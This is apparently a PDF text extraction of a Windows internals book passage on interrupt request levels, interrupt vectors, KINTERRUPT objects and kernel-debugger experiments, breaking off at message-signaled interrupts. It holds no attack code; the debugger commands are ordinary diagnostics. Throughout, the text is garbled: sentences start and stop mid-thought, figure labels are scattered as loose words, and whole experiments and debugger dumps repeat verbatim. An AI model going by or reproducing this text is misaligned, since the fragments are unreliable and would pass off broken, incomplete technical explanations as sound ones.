lvl high
Inti0A.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti0B.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
CHAPTER 8 System mechanisms
39
x86
Hardware
interrupts
Software
interrupts
Normal thread
execution
High
Power fail
Interprocessor interrupt
Clock
Profile/Synch
Device n
•
•
•
Corrected Machine Check Interrupt
Device 1
DPC/dispatch
APC
Passive/Low
•••
31
30
29
28
27
26
5
4
3
2
1
0
x64
•••
15
14
13
12
11
4
3
2
1
0
High/Profile
Interprocessor interrupt/Power
Clock
Synch
Device n
Device 1
Dispatch/DPC
APC
Passive/Low
FIGURE 8-13 x86 and x64 interrupt request levels (IRQLs).
IRQL priority levels have a completely different meaning than thread-scheduling priorities (which
are described in Chapter 5 of Part 1). A scheduling priority is an attribute of a thread, whereas an IRQL
is an attribute of an interrupt source, such as a keyboard or a mouse. In addition, each processor has an
IRQL setting that changes as operating system code executes. As mentioned earlier, on x64 systems,
the IRQL is stored in the CR8 register that maps back to the TPR on the APIC.
-
by calling KeRaiseIrql and KeLowerIrql or, more commonly, indirectly via calls to functions that acquire
the current level interrupt the processor, whereas interrupts from sources with IRQLs equal to or be-
low the current level are masked until an executing thread lowers the IRQL.
Interrupts masked on
Processor A
Interrupts masked on
Processor B
Processor B
Processor A
IRQL setting
•••
High/Profile
Interprocessor interrupt/Power
Clock
Synch
Device n
Device 1
Dispatch/DPC
APC
Passive/Low
IRQL = DPC/dispatch
IRQL = Clock
FIGURE 8-14 Masking interrupts.
40
CHAPTER 8 System mechanisms
-
-
rupt source. This elevation masks all interrupts at and below that IRQL (on that processor only), which
lower level. The masked interrupts are either handled by another processor or held back until the IRQL
drops. Therefore, all components of the system, including the kernel and device drivers, attempt to
keep the IRQL at passive level (sometimes called low level). They do this because device drivers can re-
periods. Thus, when the system is not performing any interrupt work (or needs to synchronize with it)
or handling a software interrupt such as a DPC or APC, the IRQL is always 0. This obviously includes any
-
fects on system operation. In fact, returning to a user-mode thread with the IRQL above 0 results in an
immediate system crash (bugcheck) and is a serious driver bug.
another due to preemption—run at IRQL 2 (hence the name dispatch level), meaning that the proces-
sor behaves in a single-threaded, cooperative fashion at this level and above. It is, for example, illegal to
wait on a dispatcher object (more on this in the “Synchronization” section that follows) at this IRQL, as
a context switch to a different thread (or the idle thread) would never occur. Another restriction is that
only nonpaged memory can be accessed at IRQL DPC/dispatch level or higher.
resident results in a page fault. When a page fault occurs, the memory manager initiates a disk I/O and
the scheduler to perform a context switch (perhaps to the idle thread if no user thread is waiting to
level or higher at the time of the disk read). A further problem results in the fact that I/O completion
complete because the completion APC would not get a chance to run.
If either of these two restrictions is violated, the system crashes with an IRQL_NOT_LESS_OR_EQUAL
or a DRIVER_IRQL_NOT_LESS_OR_EQUAL crash code. (See Chapter 10, “Management, diagnostics, and
tracing” for a thorough discussion of system crashes.) Violating these restrictions is a common bug in
type of bug.
Conversely, this also means that when working at IRQL 1 (also called APC level), preemption is still
active and context switching can occur. This makes IRQL 1 essentially behave as a thread-local IRQL
instead of a processor-local IRQL, since a wait operation or preemption operation at IRQL 1 will cause
KTHREAD structure, as seen
thread at passive level (IRQL 0) can still preempt a thread running at APC level (IRQL 1), because below
IRQL 2, the scheduler decides which thread controls the processor.
CHAPTER 8 System mechanisms
41
EXPERIMENT: Viewing the IRQL
!irql debugger command. The saved IRQL rep-
resents the IRQL at the time just before the break-in to the debugger, which raises the IRQL to a
static, meaningless value:
kd> !irql
Debugger saved IRQL for processor 0x0 -- 0 (LOW_LEVEL)
is the processor control region (PCR), whereas its extension, the processor region control block
(PRCB), contains the saved IRQL in the DebuggerSavedIRQL
a remote kernel debugger will raise the IRQL to HIGH_LEVEL to stop any and all asynchronous
processor operations while the user is debugging the machine, which would cause the output
of !irql to be meaningless. This “saved” value is thus used to indicate the IRQL right before the
debugger is attached.
interprocessor in-
terrupt (IPI) to request that another processor perform an action, such as dispatching a particular
thread for execution or updating its translation look-aside buffer (TLB) cache. The system clock
generates an interrupt at regular intervals, and the kernel responds by updating the clock and
measuring thread execution time. The HAL provides interrupt levels for use by interrupt-driven
software interrupts (described later in this chapter) to initiate thread scheduling and to asynchro-
Mapping interrupt vectors to IRQLs
On systems without an APIC-based architecture, the mapping between the GSIV/IRQ and the IRQL had
to be strict. To avoid situations where the interrupt controller might think an interrupt line is of higher
-
terrupt is not tied to its GSIV/IRQ, but rather to the interrupt vector: the upper 4 bits of the vector map
back to the priority. Since the IDT can have up to 256 entries, this gives a space of 16 possible priorities
(for example, vector 0x40 would be priority 4), which are the same 16 numbers that the TPR can hold,
which map back to the same 16 IRQLs that Windows implements!
appropriate interrupt vector for the interrupt, and program the IOAPIC to use that vector for the asso-
choose an interrupt vector that maps back to that priority. These decisions are performed by the Plug
and Play manager working in concert with a type of device driver called a bus driver, which determines
the presence of devices on its bus (PCI, USB, and so on) and what interrupts can be assigned to a device.
EXPERIMENT: Viewing the IRQL
!irql debugger command. The saved IRQL rep-
resents the IRQL at the time just before the break-in to the debugger, which raises the IRQL to a
static, meaningless value:
kd> !irql
Debugger saved IRQL for processor 0x0 -- 0 (LOW_LEVEL)
is the processor control region (PCR), whereas its extension, the processor region control block
(PRCB), contains the saved IRQL in the DebuggerSavedIRQL
a remote kernel debugger will raise the IRQL to HIGH_LEVEL to stop any and all asynchronous
processor operations while the user is debugging the machine, which would cause the output
of !irql to be meaningless. This “saved” value is thus used to indicate the IRQL right before the
debugger is attached.
interprocessor in-
terrupt (IPI) to request that another processor perform an action, such as dispatching a particular
terrupt (IPI) to request that another processor perform an action, such as dispatching a particular
terrupt
thread for execution or updating its translation look-aside buffer (TLB) cache. The system clock
generates an interrupt at regular intervals, and the kernel responds by updating the clock and
measuring thread execution time. The HAL provides interrupt levels for use by interrupt-driven
software interrupts (described later in this chapter) to initiate thread scheduling and to asynchro-
42
CHAPTER 8 System mechanisms
The bus driver reports this information to the Plug and Play manager, which decides—after taking into
account the acceptable interrupt assignments for all other devices—which interrupt will be assigned to
each device. Then it calls a Plug and Play interrupt arbiter, which maps interrupts to IRQLs. This arbiter
is exposed by the HAL, which also works with the ACPI bus driver and the PCI bus driver to collectively
determine the appropriate mapping. In most cases, the ultimate vector number is selected in a round-
later in this section shows how the debugger can query this information from the interrupt arbiter.
Outside of arbitered interrupt vectors associated with hardware interrupts, Windows also has a num-
Table 8-4.
TABLE 8-4
Vector
Usage
APC interrupt
0x2F
DPC interrupt
0x30
Hypervisor interrupt
0x31-0x34
VMBus interrupt(s)
0x35
CMCI interrupt
0xCD
Thermal interrupt
0xCE
IOMMU interrupt
0xCF
DMA interrupt
0xD1
Clock timer interrupt
0xD2
Clock IPI interrupt
0xD3
Clock always on interrupt
0xD7
Reboot Interrupt
0xD8
Stub interrupt
0xD9
Test interrupt
0xDF
Spurious interrupt
0xE1
IPI interrupt
0xE2
LAPIC error interrupt
0xE3
DRS interrupt
0xF0
Watchdog interrupt
0xFB
Hypervisor HPET interrupt
0xFD
0xFE
Performance interrupt
CHAPTER 8 System mechanisms
43
Predefined IRQLs
I
The kernel typically uses highKeBugCheckEx and mask-
ing out all interrupts or when a remote kernel debugger is attached. The profile level shares the
enabled. The performance interrupt, associated with such features as Intel Processor Trace (Intel
PT) and other hardware performance monitoring unit (PMU) capabilities, also runs at this level.
I
Interprocessor interrupt level is used to request another processor to perform an action, such
Deferred Recovery Service (DRS) level also shares the same value and is used on x64 systems
by the Windows Hardware Error Architecture (WHEA) for performing recovery from certain
Machine Check Errors (MCE).
I
Clock
to measure and allot CPU time to threads.
I
The synchronization IRQL is internally used by the dispatcher and scheduler code to protect
highest level right after the device IRQLs.
I
The device IRQLs are used to prioritize device interrupts. (See the previous section for how hard-
ware interrupt levels are mapped to IRQLs.)
I
The corrected machine check interrupt level is used to signal the operating system after a serious
the Machine Check Error (MCE) interface.
I
DPC/dispatch-level and APC-level interrupts are software interrupts that the kernel and device
drivers generate. (DPCs and APCs are explained in more detail later in this chapter.)
I
The lowest IRQL, passive
thread execution takes place and all interrupts can occur.
Interrupt objects
The kernel provides a portable mechanism—a kernel control object called an interrupt object, or
KINTERRUPT—that allows device drivers to register ISRs for their devices. An interrupt object contains
all the information the kernel needs to associate a device ISR with a particular hardware interrupt,
including the address of the ISR, the polarity and trigger mode of the interrupt, the IRQL at which the
device interrupts, sharing state, the GSIV and other interrupt controller data, as well as a host of perfor-
mance statistics.
44
CHAPTER 8 System mechanisms
These interrupt objects are allocated from a common pool of memory, and when a device driver
registers an interrupt (with IoConnectInterrupt or IoConnectInterruptEx), one is initialized with all the
necessary information. Based on the number of processors eligible to receive the interrupt (which is
indicated by the device driver when specifying the interrupt affinity
for each one—in the typical case, this means for every processor on the machine. Next, once an inter-
InterruptObject) of each eligible processor
kernel updates the DispatchAddressKINTERRUPT data structure) to point to the function
KiChainedDispatchInterruptListEntry
then KiInterruptDispatch is used instead.
The interrupt object also stores the IRQL associated with the interrupt so that KiInterruptDispatch or
KiChainedDispatch can raise the IRQL to the correct level before calling the ISR and then lower the IRQL
to the interrupt object (or any other argument for that matter) on the initial dispatch because the initial
dispatch is done by hardware.
When an interrupt occurs, the IDT points to one of 256 copies of the KiIsrThunk function, each one
having a different line of assembly code that pushes the interrupt vector on the kernel stack (because
this is not provided by the processor) and then calling a shared KiIsrLinkage function, which does the
rest of the processing. Among other things, the function builds an appropriate trap frame as explained
-
InterruptObject array and using
the interrupt vector on the stack as an index, dereferencing the matching pointer. On the other hand,
value of the registry value BugCheckUnexpectedInterrupts
KeBugCheckEx, or the inter-
rupt is silently ignored, and execution is restored back to the original control point.
KiInterruptDispatchNoLock,
which is used for interrupts that do not have an associated kernel-managed spinlock (typically used by
drivers that want to synchronize with their ISRs), KiInterruptDispatchNoLockNoEtw for interrupts that do
not want ETW performance tracing, and KiSpuriousDispatchNoEOI for interrupts that are not required
to send an end-of-interrupt signal since they are spurious.
KiInterruptDispatchNoEOI, which is used for interrupts that have programmed the APIC in
Auto-End-of-Interrupt (Auto-EOI) mode—because the interrupt controller will send the EOI signal au-
interrupt routines take advantage of the “no-lock” dispatch code because the HAL does not require the
kernel to synchronize with its ISR.
CHAPTER 8 System mechanisms
45
Another kernel interrupt handler is KiFloatingDispatch, which is used for interrupts that require
ISRs might need to use these registers (such as the video card ISR performing a quick drawing opera-
tion). When connecting an interrupt, drivers can set the FloatingSave argument to TRUE, requesting
this greatly increases interrupt latency.) Note that this is supported only on 32-bit systems.
Regardless of which dispatch routine is used, ultimately a call to the ServiceRoutine
message signaled
interrupts (MSI), which are explained later, this is a pointer to KiInterruptMessageDispatch, which will
then call the MessageServiceRoutine
those based on NDIS or StorPort (more on driver frameworks is explained in Chapter 6 of Part 1, “I/O
KiInterruptDispatch
Read from device
Acknowledge-
Interrupt
Request DPC
Driver ISR
Raise IRQL
Grab Spinlock
Drop Spinlock
Lower IRQL
Dispatch
Code
KilsrLinkage
I/O APIC
Peripheral Device
Controller
CPU Interrupt
Dispatch Table
Interrupt
Object
ISR Address
Spinlock
Dispatcher
CPU KPRCB
CPU
CPU
CPU Local
APIC
0
2
3
n
0
2
3
n
FIGURE 8-15
46
CHAPTER 8 System mechanisms
Associating an ISR with a particular level of interrupt is called connecting an interrupt object, and dissoci-
ating an ISR from an IDT entry is called disconnecting an interrupt object. These operations, accomplished by
calling the kernel functions IoConnectInterruptEx and IoDisconnectInterruptEx, allow a device driver to “turn
on” an ISR when the driver is loaded into the system and to “turn off” the ISR if the driver is unloaded.
-
dling directly with interrupt hardware (which differs among processor architectures) and from needing
to know any details about the IDT. This kernel feature aids in creating portable device drivers because it
-
nize the execution of the ISR with other parts of a device driver that might share data with the ISR. (See
Chapter 6 in Part 1 for more information about how device drivers respond to interrupts.)
We also described the concept of a chained dispatch, which allows the kernel to easily call more than
one ISR for any interrupt level. If multiple device drivers create interrupt objects and connect them
to the same IDT entry, the KiChainedDispatch routine calls each ISR when an interrupt occurs at the
daisy-chain
in which several devices share the same interrupt line. The chain breaks when one of the ISRs claims
ownership for the interrupt by returning a status to the interrupt dispatcher.
If multiple devices sharing the same interrupt require service at the same time, devices not acknowl-
edged by their ISRs will interrupt the system again once the interrupt dispatcher has lowered the IRQL.
Chaining is permitted only if all the device drivers wanting to use the same interrupt indicate to the ker-
nel that they can share the interrupt (indicated by the ShareVector
the sharing requirements of each.
EXPERIMENT: Examining interrupt internals
Using the kernel debugger, you can view details of an interrupt object, including its IRQL, ISR
!idt debugger command and
check whether you can locate an entry that includes a reference to I8042KeyboardInterruptService,
the ISR routine for the PS2 keyboard device. Alternatively, you can look for entries pointing to
Stornvme.sys or Scsiport.sys or any other third-party driver you recognize. In a Hyper-V virtual
device entry:
70: fffff8045675a600 i8042prt!I8042KeyboardInterruptService (KINTERRUPT ffff8e01cbe3b280)
To view the contents of the interrupt object associated with the interrupt, you can simply click
on the link that the debugger offers, which uses the dt command, or you can manually use the
dx
6: kd> dt nt!_KINTERRUPT ffff8e01cbe3b280
+0x000 Type
: 0n22
+0x002 Size
: 0n256
+0x008 InterruptListEntry : _LIST_ENTRY [ 0x00000000`00000000 - 0x00000000`00000000 ]
EXPERIMENT: Examining interrupt internals
Using the kernel debugger, you can view details of an interrupt object, including its IRQL, ISR
!idt debugger command and
check whether you can locate an entry that includes a reference to I8042KeyboardInterruptService,
the ISR routine for the PS2 keyboard device. Alternatively, you can look for entries pointing to
Stornvme.sys or Scsiport.sys or any other third-party driver you recognize. In a Hyper-V virtual
device entry:
70: fffff8045675a600 i8042prt!I8042KeyboardInterruptService (KINTERRUPT ffff8e01cbe3b280)
To view the contents of the interrupt object associated with the interrupt, you can simply click
on the link that the debugger offers, which uses the dt command, or you can manually use the
dx
6: kd> dt nt!_KINTERRUPT ffff8e01cbe3b280
+0x000 Type
: 0n22
+0x002 Size
: 0n256
+0x008 InterruptListEntry : _LIST_ENTRY [ 0x00000000`00000000 - 0x00000000`00000000 ]
CHAPTER 8 System mechanisms
47
+0x018 ServiceRoutine : 0xfffff804`65e56820
unsigned char i8042prt!I8042KeyboardInterruptService
+0x020 MessageServiceRoutine : (null)
+0x028 MessageIndex : 0
+0x030 ServiceContext : 0xffffe50f`9dfe9040 Void
+0x038 SpinLock
: 0
+0x040 TickCount
: 0
+0x048 ActualLock
: 0xffffe50f`9dfe91a0 -> 0
+0x050 DispatchAddress : 0xfffff804`565ca320 void nt!KiInterruptDispatch+0
+0x058 Vector
: 0x70
+0x05c Irql
: 0x7 ''
+0x05d SynchronizeIrql : 0x7 ''
+0x05e FloatingSave : 0 ''
+0x05f Connected
: 0x1 ''
+0x060 Number
: 6
+0x064 ShareVector
: 0 ''
+0x065 EmulateActiveBoth : 0 ''
+0x066 ActiveCount
: 0
+0x068 InternalState : 0n4
+0x06c Mode
: 1 ( Latched )
+0x070 Polarity
: 0 ( InterruptPolarityUnknown )
+0x074 ServiceCount : 0
+0x078 DispatchCount : 0
+0x080 PassiveEvent : (null)
+0x088 TrapFrame
: (null)
+0x090 DisconnectData : (null)
+0x098 ServiceThread : (null)
+0x0a0 ConnectionData : 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA
+0x0a8 IntTrackEntry : 0xffffe50f`9d091d90 Void
+0x0b0 IsrDpcStats
: _ISRDPCSTATS
+0x0f0 RedirectObject : (null)
+0x0f8 Padding
: [8] ""
In this example, the IRQL that Windows assigned to the interrupt is 7, which matches the fact
from the DispatchAddressKiInterruptDispatch-style interrupt with no
additional optimizations or sharing.
If you wanted to see which GSIV (IRQ) was associated with the interrupt, there are two ways
INTERRUPT_CONNECTION_DATA structure embedded in the ConnectionData
dt command to dump the
pointer from your system as follows:
6: kd> dt 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA Vectors[0]..
nt!_INTERRUPT_CONNECTION_DATA
+0x008 Vectors
: [0]
+0x000 Type
: 0 ( InterruptTypeControllerInput )
+0x004 Vector
: 0x70
+0x008 Irql
: 0x7 ''
+0x00c Polarity : 1 ( InterruptActiveHigh )
+0x010 Mode
: 1 ( Latched )
+0x018 TargetProcessors :
+0x018 ServiceRoutine : 0xfffff804`65e56820
unsigned char i8042prt!I8042KeyboardInterruptService
+0x020 MessageServiceRoutine : (null)
+0x028 MessageIndex : 0
+0x030 ServiceContext : 0xffffe50f`9dfe9040 Void
+0x038 SpinLock
: 0
+0x040 TickCount
: 0
+0x048 ActualLock
: 0xffffe50f`9dfe91a0 -> 0
+0x050 DispatchAddress : 0xfffff804`565ca320 void nt!KiInterruptDispatch+0
+0x058 Vector
: 0x70
+0x05c Irql
: 0x7 ''
+0x05d SynchronizeIrql : 0x7 ''
+0x05e FloatingSave : 0 ''
+0x05f Connected
: 0x1 ''
+0x060 Number
: 6
+0x064 ShareVector
: 0 ''
+0x065 EmulateActiveBoth : 0 ''
+0x066 ActiveCount
: 0
+0x068 InternalState : 0n4
+0x06c Mode
: 1 ( Latched )
+0x070 Polarity
: 0 ( InterruptPolarityUnknown )
+0x074 ServiceCount : 0
+0x078 DispatchCount : 0
+0x080 PassiveEvent : (null)
+0x088 TrapFrame
: (null)
+0x090 DisconnectData : (null)
+0x098 ServiceThread : (null)
+0x0a0 ConnectionData : 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA
+0x0a8 IntTrackEntry : 0xffffe50f`9d091d90 Void
+0x0b0 IsrDpcStats
: _ISRDPCSTATS
+0x0f0 RedirectObject : (null)
+0x0f8 Padding
: [8] ""
In this example, the IRQL that Windows assigned to the interrupt is 7, which matches the fact
from the DispatchAddressKiInterruptDispatch-style interrupt with no
additional optimizations or sharing.
If you wanted to see which GSIV (IRQ) was associated with the interrupt, there are two ways
INTERRUPT_CONNECTION_DATA structure embedded in the ConnectionData
dt command to dump the
pointer from your system as follows:
6: kd> dt 0xffffe50f`9db3bd90 _INTERRUPT_CONNECTION_DATA Vectors[0]..
nt!_INTERRUPT_CONNECTION_DATA
+0x008 Vectors
: [0]
+0x000 Type
: 0 ( InterruptTypeControllerInput )
+0x004 Vector
: 0x70
+0x008 Irql
: 0x7 ''
+0x00c Polarity : 1 ( InterruptActiveHigh )
+0x010 Mode
: 1 ( Latched )
+0x018 TargetProcessors :
48
CHAPTER 8 System mechanisms
+0x000 Mask
: 0xff
+0x008 Group
: 0
+0x00a Reserved : [3] 0
+0x028 IntRemapInfo :
+0x000 IrtIndex : 0y000000000000000000000000000000 (0)
+0x000 FlagHalInternal : 0y0
+0x000 FlagTranslated : 0y0
+0x004 u
: <anonymous-tag>
+0x038 ControllerInput :
+0x000 Gsiv
: 1
The Type indicates that this is a traditional line/controller-based input, and the Vector
and Irql
ControllerInput
different kind of interrupt, such as a Message Signaled Interrupt (more on this later), you would
dereference the MessageRequest
Another way to map GSIV to interrupt vectors is to recall that Windows keeps track of this
translation when managing device resources through what are called arbiters
type, an arbiter maintains the relationship between virtual resource usage (such as an interrupt
vector) and physical resources (such as an interrupt line). As such, you can query the ACPI IRQ
arbiter and obtain this mapping. Use the !apciirqarb command to obtain information on the
ACPI IRQ arbiter:
6: kd> !acpiirqarb
Processor 0 (0, 0):
Device Object: 0000000000000000
Current IDT Allocation:
...
000000070 - 00000070 D ffffe50f9959baf0 (i8042prt) A:ffffce0717950280 IRQ(GSIV):1
...
Note that the GSIV for the keyboard is IRQ 1, which is a legacy number from back in the IBM
PC/AT days that has persisted to this day. You can also use !arbiter 4 (4 tells the debugger to
6: kd> !arbiter 4
DEVNODE ffffe50f97445c70 (ACPI_HAL\PNP0C08\0)
Interrupt Arbiter "ACPI_IRQ" at fffff804575415a0
Allocated ranges:
0000000000000001 - 0000000000000001
ffffe50f9959baf0 (i8042prt)
note that in either output, you are given the owner of the vector, in the type of a device object (in
!devobj command to get information on
the i8042prt device in this example (which corresponds to the PS/2 driver):
6: kd> !devobj 0xFFFFE50F9959BAF0
Device object (ffffe50f9959baf0) is for:
00000049 \Driver\ACPI DriverObject ffffe50f974356f0
+0x000 Mask
: 0xff
+0x008 Group
: 0
+0x00a Reserved : [3] 0
+0x028 IntRemapInfo :
+0x000 IrtIndex : 0y000000000000000000000000000000 (0)
+0x000 FlagHalInternal : 0y0
+0x000 FlagTranslated : 0y0
+0x004 u
: <anonymous-tag>
+0x038 ControllerInput :
+0x000 Gsiv
: 1
The Type indicates that this is a traditional line/controller-based input, and the Vector
and Irql
Irql
Irql
ControllerInput
ControllerInput
ControllerInput
different kind of interrupt, such as a Message Signaled Interrupt (more on this later), you would
dereference the MessageRequest
MessageRequest
MessageRequest
Another way to map GSIV to interrupt vectors is to recall that Windows keeps track of this
translation when managing device resources through what are called arbiters
type, an arbiter maintains the relationship between virtual resource usage (such as an interrupt
vector) and physical resources (such as an interrupt line). As such, you can query the ACPI IRQ
arbiter and obtain this mapping. Use the !apciirqarb command to obtain information on the
ACPI IRQ arbiter:
6: kd> !acpiirqarb
Processor 0 (0, 0):
Device Object: 0000000000000000
Current IDT Allocation:
...
000000070 - 00000070 D ffffe50f9959baf0 (i8042prt) A:ffffce0717950280 IRQ(GSIV):1
...
Note that the GSIV for the keyboard is IRQ 1, which is a legacy number from back in the IBM
PC/AT days that has persisted to this day. You can also use !arbiter 4 (4 tells the debugger to
6: kd> !arbiter 4
DEVNODE ffffe50f97445c70 (ACPI_HAL\PNP0C08\0)
Interrupt Arbiter "ACPI_IRQ" at fffff804575415a0
Allocated ranges:
0000000000000001 - 0000000000000001
ffffe50f9959baf0 (i8042prt)
note that in either output, you are given the owner of the vector, in the type of a device object (in
device object (in
device object
!devobj command to get information on
the i8042prt device in this example (which corresponds to the PS/2 driver):
6: kd> !devobj 0xFFFFE50F9959BAF0
Device object (ffffe50f9959baf0) is for:
00000049 \Driver\ACPI DriverObject ffffe50f974356f0
CHAPTER 8 System mechanisms
49
Current Irp 00000000 RefCount 1 Type 00000032 Flags 00001040
SecurityDescriptor ffffce0711ebf3e0 DevExt ffffe50f995573f0 DevObjExt ffffe50f9959bc40
DevNode ffffe50f9959e670
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0x00000080) FILE_AUTOGENERATED_DEVICE_NAME
AttachedDevice (Upper) ffffe50f9dfe9040 \Driver\i8042prt
Device queue is not busy.
The device object is associated to a device node-
es. You can now dump these resources with the !devnode
ask for both raw and translated resource information:
6: kd> !devnode ffffe50f9959e670 f
DevNode 0xffffe50f9959e670 for PDO 0xffffe50f9959baf0
InstancePath is "ACPI\LEN0071\4&36899b7b&0"
ServiceName is "i8042prt"
TargetDeviceNotify List - f 0xffffce0717307b20 b 0xffffce0717307b20
State = DeviceNodeStarted (0x308)
Previous State = DeviceNodeEnumerateCompletion (0x30d)
CmResourceList at 0xffffce0713518330 Version 1.1 Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x1, Vector 0x1, Group 0, Affinity 0xffffffff
...
TranslatedResourceList at 0xffffce0713517bb0 Version 1.1 Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x7, Vector 0x70, Group 0, Affinity 0xff
The device node tells you that this device has a resource list with three entries, one of which
is an interrupt entry corresponding to IRQ 1. (The level and vector numbers represent the GSIV
IRQL as 7 (this is the level number) and the interrupt vector as 0x70.
On ACPI systems, you can also obtain this information in a slightly easier way by reading the
extended output of the !acpiirqarb command introduced earlier. As part of its output, it displays
the IRQ to IDT mapping table:
Interrupt Controller (Inputs: 0x0-0x77):
(01)Cur:IDT-70 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(02)Cur:IDT-80 Ref-1 Boot-1 edg hi Pos:IDT-00 Ref-0 Boot-1 lev unk
(08)Cur:IDT-90 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
Current Irp 00000000 RefCount 1 Type 00000032 Flags 00001040
SecurityDescriptor ffffce0711ebf3e0 DevExt ffffe50f995573f0 DevObjExt ffffe50f9959bc40
DevNode ffffe50f9959e670
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0x00000080) FILE_AUTOGENERATED_DEVICE_NAME
AttachedDevice (Upper) ffffe50f9dfe9040 \Driver\i8042prt
Device queue is not busy.
The device object is associated to a device node-
es. You can now dump these resources with the !devnode
ask for both raw and translated resource information:
6: kd> !devnode ffffe50f9959e670 f
DevNode 0xffffe50f9959e670 for PDO 0xffffe50f9959baf0
InstancePath is "ACPI\LEN0071\4&36899b7b&0"
ServiceName is "i8042prt"
TargetDeviceNotify List - f 0xffffce0717307b20 b 0xffffce0717307b20
State = DeviceNodeStarted (0x308)
Previous State = DeviceNodeEnumerateCompletion (0x30d)
CmResourceList at 0xffffce0713518330 Version 1.1 Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x1, Vector 0x1, Group 0, Affinity 0xffffffff
...
TranslatedResourceList at 0xffffce0713517bb0 Version 1.1 Interface 0xf Bus #0
Entry 0 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x60 for 0x1 bytes
Entry 1 - Port (0x1) Device Exclusive (0x1)
Flags (PORT_MEMORY PORT_IO 16_BIT_DECODE
Range starts at 0x64 for 0x1 bytes
Entry 2 - Interrupt (0x2) Device Exclusive (0x1)
Flags (LATCHED
Level 0x7, Vector 0x70, Group 0, Affinity 0xff
The device node tells you that this device has a resource list with three entries, one of which
is an interrupt entry corresponding to IRQ 1. (The level and
level and
level
vector numbers represent the GSIV
vector numbers represent the GSIV
vector
IRQL as 7 (this is the level number) and the interrupt vector as 0x70.
level number) and the interrupt vector as 0x70.
level
On ACPI systems, you can also obtain this information in a slightly easier way by reading the
extended output of the !acpiirqarb command introduced earlier. As part of its output, it displays
the IRQ to IDT mapping table:
Interrupt Controller (Inputs: 0x0-0x77):
(01)Cur:IDT-70 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(02)Cur:IDT-80 Ref-1 Boot-1 edg hi Pos:IDT-00 Ref-0 Boot-1 lev unk
(08)Cur:IDT-90 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
50
CHAPTER 8 System mechanisms
(09)Cur:IDT-b0 Ref-1 Boot-0 lev hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(0e)Cur:IDT-a0 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(10)Cur:IDT-b5 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(11)Cur:IDT-a5 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(12)Cur:IDT-95 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(14)Cur:IDT-64 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(17)Cur:IDT-54 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(1f)Cur:IDT-a6 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(41)Cur:IDT-96 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
resources, and other related concepts, see Chapter 6 in Part 1.
Line-based versus message signaled–based interrupts
Shared interrupts are often the cause of high interrupt latency and can also cause stability issues. They
are typically undesirable and a side effect of the limited number of physical interrupt lines on a com-
Memory Stick, Secure Digital, and other formats, all the controllers that are part of the same physical
-
ent device drivers as a shared interrupt vector. This adds latency as each one is called in a sequence to
determine the actual controller that is sending the interrupt for the media device.
A much better solution is for each device controller to have its own interrupt and for one driver to
manage the different interrupts, knowing which device they came from. However, consuming four tra-
ditional IRQ lines for a single device quickly leads to IRQ line exhaustion. Additionally, PCI devices are
each connected to only one IRQ line anyway, so the media card reader cannot use more than one IRQ
Other problems with generating interrupts through an IRQ line is that incorrect management of the
IRQ signal can lead to interrupt storms or other kinds of deadlocks on the machine because the signal
-
cally receive an EOI signal as well.) If either of these does not happen due to a bug, the system can end
interrupts provide poor scalability in multiprocessor environments. In many cases, the hardware has
manager selected for this interrupt, and device drivers can do little about it.
message-signaled
interrupts (MSI). Although it was an optional component of the standard that was seldom found in
client machines (and mostly found on servers for network card and storage controller performance),
most modern systems, thanks to PCI Express 3.0 and later, fully embrace this model. In the MSI world, a
this is essentially treated like a Direct Memory Access (DMA) operation as far as hardware is concerned.
This action causes an interrupt, and Windows then calls the ISR with the message content (value) and
(09)Cur:IDT-b0 Ref-1 Boot-0 lev hi Pos:IDT-00 Ref-0 Boot-0 lev unk
(0e)Cur:IDT-a0 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
